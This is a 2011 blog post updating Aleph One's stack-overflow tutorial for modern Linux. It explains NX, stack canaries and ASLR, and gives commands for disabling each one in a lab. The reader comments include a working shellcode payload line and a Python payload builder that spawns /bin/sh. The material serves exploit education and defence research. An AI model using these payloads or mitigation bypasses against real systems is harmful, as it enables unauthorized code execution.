Smashing the Stack in 2011

January 25, 2011

Recently, as part of Professor Brumley’s Vulnerability, Defense Systems, and Malware Analysis class at Carnegie Mellon, I took another look at Aleph One (Elias Levy)’s Smashing the Stack for Fun and Profit article, which originally appeared in Phrack and on Bugtraq in November of 1996. Newcomers to exploit development are often still referred (and rightly so) to Aleph’s paper. Smashing the Stack was the first lucid tutorial on the topic of exploiting stack-based buffer overflow vulnerabilities. Perhaps even more important was Smashing the Stack’s ability to force the reader to think like an attacker. While the specifics mentioned in the paper apply only to stack-based buffer overflows, the thought process that Aleph suggested to the reader is one that will yield success in any type of exploit development.

(Un)fortunately for today’s would-be exploit developer, much has changed since 1996, and unless Aleph’s tutorial is carried out with additional instructions or on a particularly old machine, some of the exercises presented in Smashing the Stack will no longer work. There are a number of reasons for this, some incidental, some intentional. I attempt to enumerate the intentional hurdles here and provide instruction for overcoming some of the challenges that fifteen years of exploit defense research have presented to the attacker. An effort is made to maintain the tutorial feel of Aleph’s article.

Related Work

Craig J. Heffner wrote a similar article, which appeared on The Ethical Hacker Network in February of 2007. This article differs from Heffner’s in its emphasis on the exploit mitigations developed since 1996 and their effect on several of Aleph’s excerpts and examples. Also, several years have passed since Heffner’s article and another update couldn’t hurt.

Mariano Graziano and Andrea Cugliari wrote a much more formal paper, Smashing the stack in 2010, on the mitigations discussed here as well as their counterparts on Windows. From their abstract: “First of all we are going to analyze all the basical theoretical aspects behind the concept of Buffer Overflows…Subsequently the paper will analyze in detail all the aspects and mechanisms that regulate the way in which Buffer Overflow works on Linux and Windows architectures taking with particular care also the countermeasures introduced until nowadays for both the mentioned operating systems…we are going also to try some tricks to bypass these protections, in order to exploit the vulnerability even if a countermeasure has been adopted in the modern operating systems.” Regrettably, I had only become aware of their paper after I had published this post, and while Graziano/Cugliari’s paper and this blog post serve different purposes, my apologies to Graziano & Cugliari for failing to find their paper previously.

Introduction

Ubuntu has become a popular distribution for new Linux users as of late, so it’s reasonable to assume that budding security professionals interested in learning more about memory corruption exploitation are likely to use it. As such, all instructions presented here have been tested on a vanilla Ubuntu 10.10 i386 desktop install (no updates; the only additional required package is execstack) running within VMware Workstation 7.1.3. Furthermore, Ubuntu provides a convenient table telling us what we’re up against. While these instructions have been tested on Ubuntu 10.10, their specifics should not vary greatly between distributions. Google is your friend.

My intention is for the reader to have this article open in one tab and Smashing the Stack open in another. Much of what Aleph explains has not changed since 1996 (e.g. the x86 ABI), so it would make little sense to repeat him here. Rather, I will pick and choose excerpts & examples that have become antiquated in some way, explain how they have been rendered so and what we can do to complete Aleph’s tutorial. Changes to gcc that have nothing to do with exploit mitigations are glossed over.

Let’s begin.

Dynamic Buffers

Dynamic variables are allocated at run time on the stack…We will concern ourselves only with the overflow of dynamic buffers, otherwise known as stack-based buffer overflows.

Aleph implies that an exploit author’s interest in dynamic buffers is limited to those found on the stack. Since 1996, much work has been completed on the topic of exploiting heap-based dynamic buffers as well, making such an implication antiquated. The distinction between the types of allocations is commonly made by CS majors by referring to stack locals as automatic, while reserving the word dynamic for heap allocations.

Matt Conover and the w00w00 Security Team authored the seminal paper on the topic of heap-based buffer overflow exploitation in January of 1999.

Use of the EBP/RBP Registers

Consequently, many compilers use a second register, FP, for referencing both local variables and parameters because their distances from FP do not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this purpose.

It’s worth noting that on the AMD64/x86-64 architecture, 64-bit OSes typically do not treat RBP (the 64-bit equivalent of EBP) as a special purpose register, as is common on x86 architectures. This is one of many reasons why attempting Smashing the Stack on an AMD64 OS would make little sense.

Instead, [R|E]BP may be used as a general purpose register. It should be noted (thank you, Prof Brumley!) that while it is convention to treat EBP as a pointer to a stack frame on x86 systems, there is nothing that forces a developer to treat the register as such. That being said, if you’re developing for x86 Linux/Windows/OS X/etc and don’t use EBP according to convention, then you may run into trouble. I can’t think of any specific examples, but you’ve been warned.

Why mention this? EBP on x86 is treated as a control element: the saved EBP stored in each stack frame points to the location of the previous stack frame. Controlling this value would be beneficial for an attacker (see: return oriented programming). Knowing the difference in convention between x86 and AMD64 architectures is therefore interesting to an attacker.

NX

Our code modifies itself, but most operating system (sic) mark code pages read-only. To get around this restriction we must place the code we wish to execute in the stack or data segment, and transfer control to it. To do so we will place our code in a global array in the data segment.

This is where the past fifteen years offer us something exciting. On recent x86 architectures (Pentium 4+), operating systems and compilers, Intel’s eXecute Disable Bit (referred to as NX by Linux, as DEP or NX by Windows, and as Enhanced Virus Protection* by AMD) renders the above statement misleading. Jumping to the .data segment as Aleph suggests would more than likely cause a segmentation fault on a modern system, since a data segment should not legitimately contain executable code and will most likely be stored in a page that has the NX bit set.

*That’s a terrible name.

Think of the idea as akin to POSIX permissions: different users/groups have different R(ead), W(rite) and (e)X(ecute) permissions on different files. In 1996, x86 architectures only had the concept of R(ead) and W(rite) on memory pages. If something was R(eadable), then it was also (e)X(ecutable). Pentium 4 introduced hardware support for explicitly specifying whether a particular page should be (e)X(ecutable), hence NX.
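On Linux, the per-page permissions described above are visible in /proc/<pid>/maps. The following is a minimal Python sketch, not part of Aleph’s tutorial or the original post, that parses one line of that file and reports whether the mapping is executable. The sample line and the helper names are made up for illustration.

```python
# Illustrative sketch: inspect page permissions as /proc/<pid>/maps reports them.
# SAMPLE_LINE and the helper names are hypothetical, not taken from the article.

SAMPLE_LINE = "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]"


def parse_maps_line(line):
    """Return (start, end, perms, name) for one line of /proc/<pid>/maps."""
    fields = line.split()
    start, end = (int(part, 16) for part in fields[0].split("-"))
    perms = fields[1]                # e.g. "rw-p" or "r-xp"
    name = " ".join(fields[5:])      # empty string for anonymous mappings
    return start, end, perms, name


def is_executable(perms):
    """True when the mapping carries the x permission."""
    return "x" in perms


if __name__ == "__main__":
    try:
        with open("/proc/self/maps") as maps:   # Linux only
            lines = maps.read().splitlines()
    except OSError:
        lines = [SAMPLE_LINE]                   # fall back to the made-up sample
    for line in lines:
        start, end, perms, name = parse_maps_line(line)
        if name in ("[stack]", "[heap]"):
            state = "executable" if is_executable(perms) else "not executable"
            print(f"{name}: {start:#x}-{end:#x} {perms} ({state})")
```

On a system that enforces NX, the [stack] mapping would be expected to lack the x flag; a binary whose ELF header requests an executable stack would be expected to show it.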

Disabling NX mitigations varies with operating system and compiler; a gcc 4.4.5 / Ubuntu 10.10 method will be seen later in the examples.

Stack Protection & example2.c

This… program has a function with a typical buffer overflow coding error. The function copies a supplied string without bounds checking by using strcpy() instead of strncpy(). If you run this program you will get a segmentation violation.

The intent of this example is to crash the process by clobbering the return address, causing the process to attempt to return to 0x41414141 (‘AAAA’). The process certainly still crashes, but not for the same reason. Let’s look at the output generated by executing example2.c:

What happened here? Recent versions of gcc include the capability to build a mechanism for stack buffer protection into compiled programs. This capability is called ProPolice, and according to Wikipedia, it’s been largely unchanged since gcc 4.1 (Ubuntu 10.10 ships with gcc 4.4.5). A ProPolice patch is available for gcc 3.x versions and was added to the trunk in 4.x releases. The concept of the stack canary was originally proposed by Crispin Cowan in 1997 as StackGuard. The interested reader is referred to the Wikipedia entry.

OK, what does ProPolice/StackGuard/etc do?

The basic idea is to place a chosen or pseudo-random value between a stack frame’s data elements (e.g. char * buffers) and its control elements (e.g. RET address, stored EBP) that is either difficult for an attacker to replace during an attack or impossible for an attacker to predict. Before the function whose frame has been clobbered is allowed to return, this canary is checked against a known-good value. If that check fails, the process terminates, since it now considers its execution path to be in an untrusted state. “Canary” is used to describe this inserted value as a homage to the old practice of keeping canaries (the birds) in mines as a way to determine when the mine’s atmosphere becomes toxic (the canaries die before the toxicity level reaches a point that is dangerous for humans).
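The canary check described above can be modelled in a few lines. This is a toy simulation in Python, assuming a simplified frame layout of buffer, canary, saved EBP and RET; it is not how gcc implements the check (the real comparison is emitted in the function epilogue and calls __stack_chk_fail on a mismatch). The buffer size and all addresses are hypothetical.

```python
import os
import struct

BUF_SIZE = 16  # hypothetical size of the local char buffer


def make_frame(canary, saved_ebp, ret_addr):
    """Toy frame, low to high addresses: buffer | canary | saved EBP | RET."""
    return bytearray(BUF_SIZE) + struct.pack("<III", canary, saved_ebp, ret_addr)


def unchecked_copy(frame, data):
    """Mimic strcpy(): write into the buffer with no bounds check."""
    data = data[:len(frame)]         # the toy frame is all the memory we model
    frame[:len(data)] = data


def canary_intact(frame, canary):
    """The comparison a protected function performs before it returns."""
    (stored,) = struct.unpack_from("<I", frame, BUF_SIZE)
    return stored == canary


if __name__ == "__main__":
    canary = int.from_bytes(os.urandom(4), "little")   # unpredictable value
    frame = make_frame(canary, 0xBFFFF000, 0x08048000)
    unchecked_copy(frame, b"A" * 8)     # fits inside the buffer
    print("short copy, canary intact:", canary_intact(frame, canary))
    unchecked_copy(frame, b"A" * 28)    # runs over canary, saved EBP and RET
    print("long copy, canary intact:", canary_intact(frame, canary))
```

The point of the layout is that a linear overflow cannot reach the saved EBP or RET without first passing through the canary, so the overwrite is detected before the clobbered return address is used.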

example3.c

This example is uninteresting from an exploit mitigation standpoint. Stack protection will not need to be disabled, since we are directly modifying the RET address, rather than overflowing to it. NX is irrelevant since we’re still returning into an eXecutable code segment. ASLR (discussed later) is also irrelevant since we do not require knowledge of an absolute memory address. Instead, example3 adds a static amount to the return address location.

This example does not work (it still prints ‘1’) on Ubuntu 10.10, but because this is due to factors that have nothing to do with exploit mitigations, I refer the reader to Craig Heffner’s article referenced earlier.

ProPolice, NX & overflow1.c

We have the shellcode. We know it must be part of the string which we’ll use to overflow the buffer. We know we must point the return address back into the buffer.

True in 1996, not so much in 2011. As with many modern OSes, Ubuntu 10.10 marks executables as NX-compatible by default. This is, of course, in addition to the default gcc 4.4.5 behavior of adding stack protection during compilation. In order to get this example to work, we’re going to need to disable a couple of exploit mitigations.

Odd. It didn’t crash, but it also didn’t spawn a new shell. It turns out that this is due to gcc allocating far more stack space in recent versions than the gcc that Aleph was working with. Again, this isn’t directly relevant to exploit mitigations, so I’m going to gloss over the reasoning behind this.

We need to modify overflow1.c in order to account for the large amount of stack space allocated by our gcc 4.4.5:

execstack is a very simple program that modifies ELF headers to enable/disable NX protection on the stack in target binaries. Linux will respect the values placed in the ELF headers because it is not uncommon for an old binary to require an eXecutable stack. For a Windows equivalent discussion, take a look at ATL Thunk emulation (warning: PDF*; search “ATL thunk” within the document).

* An awesome PDF, that is.

ASLR & a Bunch of Examples

The problem we are faced when trying to overflow the buffer of another program is trying to figure out at what address the buffer (and thus our code) will be. The answer is that for every program the stack will start at the same address.

This is no longer true. Most modern desktop and server OSes rebase their stacks, code segments, dynamically loaded libraries and more in order to make a target address space unpredictable to an attacker. Address Space Layout Randomization (ASLR) is not particularly effective on the x86 architecture (warning: PDF) and enjoys a much larger amount of entropy on the AMD64 architecture. Regardless of the number of bits available for pseudo-random rebasing, ASLR provides another hurdle for the attacker to overcome. Unless the target process is a daemon that spawns a separate process on each exploitation attempt and then silently ignores segmentation faults & exceptions, even the lower amount of entropy available to x86 OSes is still going to prevent the attacker from conducting a successful exploit without a significant chance of a crash.

The inclusion of ASLR in Ubuntu 10.10 prevents us from gathering the type of results that 1996 would allow us to gather. In order to find a static stack pointer value (sp.c is deterministic, so the value shouldn’t change in the normal course of execution), we need to disable ASLR.

With ASLR disabled, we see results similar to Aleph’s description. A deterministic program like sp.c should, without ASLR, print the same location on every execution. Exploits often rely on the knowledge of where exactly something is mapped in target address space. ASLR removes this knowledge from a would-be attacker. The interested reader is referred to the randomize_va_space kernel patch for an explanation of possible values.
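As a quick way to see which ASLR mode a machine is in, the sketch below reads the same /proc file and maps the value to the meanings given in the kernel’s sysctl documentation. It is a minimal Python sketch; the function and constant names are made up for illustration, and it only reads the setting (changing it requires root).

```python
# Hypothetical helper names; only the /proc path and the 0/1/2 values are real.
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

MEANINGS = {
    0: "disabled: no address space randomization",
    1: "enabled: stack, mmap base and VDSO are randomized",
    2: "enabled: as 1, plus heap (brk) randomization",
}


def describe_aslr(value):
    """Translate a randomize_va_space value into a short description."""
    return MEANINGS.get(value, "unrecognized value")


def read_aslr_setting(path=ASLR_PATH):
    """Read the current setting; raises OSError where the file does not exist."""
    with open(path) as handle:
        return int(handle.read().strip())


if __name__ == "__main__":
    try:
        value = read_aslr_setting()
        print(f"randomize_va_space = {value} ({describe_aslr(value)})")
    except OSError:
        print("randomize_va_space is not available on this system")
```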

What does ASLR mean for exploit2.c as a primer to an attack on vulnerable.c? Well, you’re in for a lot more guessing. More importantly, a guess that happens to be right for one execution will almost certainly be wrong for the next, since the target address space is rebased on every execution. Using such an exploitation strategy would require guessing many times, every time, which is often not feasible against real world applications.

What about exploit3.c? In exploit3.c Aleph introduces a nopsled to his attack string. This will still help, because guessing anywhere within the range preceding the shellcode (or in more general terms: the payload) will still allow one to execute shellcode. The idea of a nopsled is independent of the idea of ASLR. ASLR will still prevent exploit3.c from working reliably, although it will work slightly more reliably than exploit2.c.
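To put rough numbers on “slightly more reliably”, here is a back-of-the-envelope model in Python. It assumes the stack is shifted uniformly over 2^entropy_bits positions in steps of a fixed granularity, and that a fixed guessed address succeeds whenever it lands inside the sled. Both the model and the figures in the example (16 bits of entropy, a 256-byte sled, 16-byte steps) are assumptions chosen for illustration, not measurements of Ubuntu 10.10.

```python
def hit_probability(entropy_bits, sled_len=0, granularity=16):
    """Approximate chance that one fixed guess lands in the sled.

    entropy_bits: bits of randomness in the stack location (assumed uniform)
    sled_len:     length of the NOP sled in bytes (0 means an exact hit is needed)
    granularity:  step size of the random shift in bytes (assumed)
    """
    positions = 2 ** entropy_bits
    winning = max(1, sled_len // granularity)   # shifts that still hit the sled
    return min(1.0, winning / positions)


def expected_attempts(probability):
    """Mean number of independent tries before the first success."""
    return 1 / probability


if __name__ == "__main__":
    for sled in (0, 256):
        p = hit_probability(16, sled_len=sled)
        print(f"sled={sled:>3} bytes: p={p:.6f}, about {expected_attempts(p):.0f} tries")
```

Under this model the sled improves the odds by a constant factor, but every failed guess is still a potential crash of the target.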

OK, what about Aleph’s technique of storing shellcode in an environment value? Also affected by ASLR. The example presented in exploit4.c will also require a lot of guessing with no correct answer in the face of ASLR.

If you wish to complete these examples, my suggestion is just to disable ASLR via /proc as demonstrated previously.

Conclusion

I’ve attempted to enumerate the challenges that the past 15 years of exploit defense research have introduced, as applicable to Aleph’s seminal paper, Smashing the Stack for Fun and Profit, and to give instruction on how one might go about following Aleph’s tutorial on a modern OS, with a specific nod to Ubuntu 10.10.

There is, however, a very good chance I missed something.

Corrections, suggestions, critiques are much appreciated. My hope is that this is helpful to some people; it certainly would have been helpful to me when I read Smashing the Stack for the first time.


Great write up, and something many new exploiters will indeed encounter. We have similar information located on the SmashTheStack forums for how to do exploitation at home on modern systems. You can see it here: http://smashthestack.org/viewtopic.php?id=388

For those interested, SmashTheStack offers a variety of Wargames for shell based local exploitation challenges and exploit development. It’s a great way to take something like this and apply it to unknown challenges.

Rather than changing the size to 128 in overflow1.c, you should be changing the stack-boundary value during compilation. gcc allocates space for a variable as multiples of its stack-boundary value AFAIK. For the example in Aleph1’s paper to work out, you need to set the stack boundary to 4 bytes (2^2) using the

-mpreferred-stack-boundary=2

argument to gcc. Also, if you wish to try out vulnerability development, I’d suggest you start out with something like DVL and then move on to Ubuntu later on.

@DVL: I completed Smashing the Stack on DVL (Damn Vulnerable Linux) 1.5 some years back, but it left me wondering why the examples would work on some intentionally insecure OS while they would fail to work on something that people might actually use. What is an OS that isn’t Damn Vulnerable doing to prevent such examples from working? Anyways, it just didn’t feel as if I had accomplished as much on DVL.

Let me know what you think about it. Finally, note that, just for the sake of clarity, I wrote only the Windows part and the analyses of two real attacks, while Andrea Cugliari, my classmate, wrote the Linux part.
To keep as up to date as possible with papers on this topic, take a look at ax330d’s awesome it-sec-catalog: https://code.google.com/p/it-sec-catalog/wiki/Exploitation

Happy hacking!

anon

February 27, 2011 at 8:48 am

The reason why sudo does not work to disable ASLR is that if you write

$ sudo echo 0 > /proc/sys/kernel/randomize_va_space

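the shell (as an unprivileged user) will attempt to open /proc/sys/kernel/randomize_va_space before executing “sudo”, which is logical because it has to redirect the output of “sudo” to it, so it fails. Performing the redirection itself as root, e.g. sudo sh -c 'echo 0 > /proc/sys/kernel/randomize_va_space', avoids the problem.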

But do you know the relationship between the mprotect() system call and the NX bit? For example, if I’m writing a program that executes code on the stack, I can either 1) call mprotect() to make the stack memory executable, or 2) do nothing special while coding and instead run execstack on the executable. Note that I’m not writing an exploit; I call mprotect() when programming. Or you could imagine that I am somehow implementing a return-to-lib attack and call mprotect() to make the stack executable.

I changed the brk-fix-2.patch link, since kernel.org still says it’s undergoing maintenance. Were there any other broken links?

As for mprotect(), if you call mprotect(), either legitimately as the program author or illegitimately during a ROP sequence, and pass PROT_EXEC as part of the bitwise OR for page permissions, then mprotect() will cause the X bit to be set on the chosen page in vanilla scenarios. If the X bit is set on a page, then NX is not applicable; the page is executable so it doesn’t matter whether the processor is enforcing execution permissions.

Is it possible that disabling ASLR with kernel.randomize_va_space= 0 (from 1 default) can lead to eth0 network nic to stop working after a while ( specifically e1000 nic on Linux Centos 5.5 64 bit)
with a Cisco vpn nic hosted on top of that nic ?
thanks for any information

While I’m not familiar with your particular situation, I can answer in general terms.

In general, ASLR is designed to break things. Good ASLR implementations break exploitation attempts and have no adverse effects (aside from overhead) on normal execution flows. Enabling ASLR carries with it the potential to break things; disabling ASLR should never break things. Put simply, ASLR rebases position independent code in virtual memory at random deltas, usually aligned to page boundaries. The amount of entropy that defines this randomness is the ASLR implementation’s potency.

Therefore, to say that code requires ASLR to function properly, as you describe, is essentially saying that the code in question relies on its inability to predetermine address space layout. I can’t imagine a non-contrived scenario in which code would rely on such information denial. The opposite is frequently true – even today, much code relies on the absence of ASLR to function properly because it makes assumptions about the address space layout that are violated by the introduction of ASLR. Put another way, if something works with ASLR enabled, but not with it disabled, I would expect it to actually work only 1/2^(number of entropy bits) fraction of the time (And perhaps fail silently the vast majority of the time), and fail always with ASLR disabled. In such a scenario, a random offset choice by ASLR happens to fix a bad assumption in code regarding the address space layout.

A quick Google search for your problem yielded this: http://www.linuxquestions.org/questions/debian-26/kernel-randomize_va_space-changes-led-to-dead-eth0-602325/. If what the poster was assuming is correct, this might serve as a pretty relevant example of code that requires ASLR to be off – the opposite of what you’re describing. Perhaps the problem you are experiencing isn’t due to ASLR’s nature, but instead due to a misconfiguration triggered by the disabling of ASLR, similar to what might be happening to the person in the aforementioned post.

Hope that helps.

moshedayan

January 3, 2012 at 1:55 pm

Probably what is going on is that disabling ASLR exposes previously silent misconfigurations, which I did indeed discover, similar to the post you mentioned. I have another question regarding ASLR: is it conceivable that it could slow down a Linux guest hosted on VMware ESX? As far as I am aware, VMware translates guest code into executable code, replacing only special privileged OS instructions (mainly memory management, from what I understood). So I am not so much interested in any slowdown from the initial translation to virtual machine format, but rather in whether, during ordinary memory-intensive run time, there may be any penalty incurred from ASLR’s randomization, for example when accessing memory in a shared library. Thanks for any information.

curious

January 5, 2012 at 8:44 pm

I want to exploit a stack-based buffer overflow for educational purposes. There is a typical function called from main with a parameter that is given as input to the program, and a local buffer where the parameter is saved. Given an input of the form nops+shellcode+address_shellcode, I will exploit it. After debugging with gdb I found the address of the shellcode as it is passed as a parameter, and right after the strcpy I examine the stack and $ebp+8, which is the return address, has been successfully overwritten with the address of the shellcode. So I have what I want. But when I stepped forward in the execution I got:

->shellcode_address in ?? ()
and then

Cannot find bound of current function
The return address has the value that I want. Any ideas what is happening? Also, when I execute it I get a segmentation fault, and I have compiled it with -g -fno-stack-protector

return 0;
}
I found out with gdb that if you overwrite 309 bytes then you will exactly overwrite the return address with the last 4 bytes of your input which is exactly what we want. So since the shell code is 45 bytes long we want sth like : \x90 x 260 . “shellcode” . 4bytes address (260+45+4=309)

To find the address of the first parameter of the function i run several times gdb with input a 309 bytes long string and the address was always the same: 0x5ffff648

So if I append an address (in reverse byte order, i.e. 0xabcdefgh -> \xgh\xef\xcd\xab) that is higher than where the parameter points, the processor will land on a NOP instruction and do nothing until it reaches the shellcode. I end up with this: r perl -e 'print ("\x90" x 260 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . "\x3e\xf8\xff\x5f")'
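The layout described in this comment (NOP sled, then shellcode, then a little-endian return address, 309 bytes in total) can also be assembled and sanity-checked in Python. This is a minimal sketch using the byte values quoted above; build_payload and its parameters are hypothetical names, and the address is only meaningful for the commenter’s own binary and environment.

```python
import struct

# Shellcode bytes exactly as quoted in the comment above (45 bytes).
SHELLCODE = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)


def build_payload(ret_addr, total_len=309, shellcode=SHELLCODE):
    """Return NOP sled + shellcode + 4-byte little-endian return address."""
    sled_len = total_len - len(shellcode) - 4
    if sled_len < 0:
        raise ValueError("total_len is too small for shellcode plus address")
    # "<I" packs an unsigned 32-bit value in little-endian (x86) byte order.
    return b"\x90" * sled_len + shellcode + struct.pack("<I", ret_addr)


if __name__ == "__main__":
    payload = build_payload(0x5FFFF83E)
    print(len(payload), "bytes; last four:", payload[-4:].hex())
```

Letting struct.pack handle the byte order avoids reversing the address by hand, which is an easy place to make a mistake.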

If you are successful in redirecting execution to your chosen address, then you should expect to be executing outside the bounds of any function for which gdb was provided symbols.

In your example, the vulnerable strcat() is overflowing a buffer on the stack, which allows you to overwrite a return address, presumably landing back onto the stack (since this is where you’re putting your NOPs + shellcode).

Therefore, messages like:
->shellcode_address in ?? ()
… and …
Cannot find bound of current function
… should be expected. They are not an indication of a problem. There are no functions on the stack, so if you’re redirecting execution to the stack, then you should be outside of any function for which gdb has symbols.

Immediately before the segfault, check your addresses (e.g. “info registers” @ gdb prompt). Is the program counter (eip on x86) pointing on the stack? Is it pointing to your NOPs + shellcode? If you know your exploit is redirecting execution to the stack, then disable NX on the stack with execstack and try again.

curious

January 9, 2012 at 1:21 pm

Thanks for spending time responding to my “long” post.
In fact I examined $eip just before the segfault and it holds the address that I force the program to jump to by overflowing the buffer. Then I examined the specific address that $eip points to and it’s a nop instruction. So it should be the NX functionality.

FG

February 1, 2012 at 3:20 pm

hmm this is very weird its taking 4032 bytes to get a segmentation fault any ideas why this might be occuring ?

Paul Makowski

I'm an MSISTM student at Carnegie Mellon's Information Networking Institute (INI). I enjoy breaking things more than building them; I use this blog to publish my successes at putting things back together.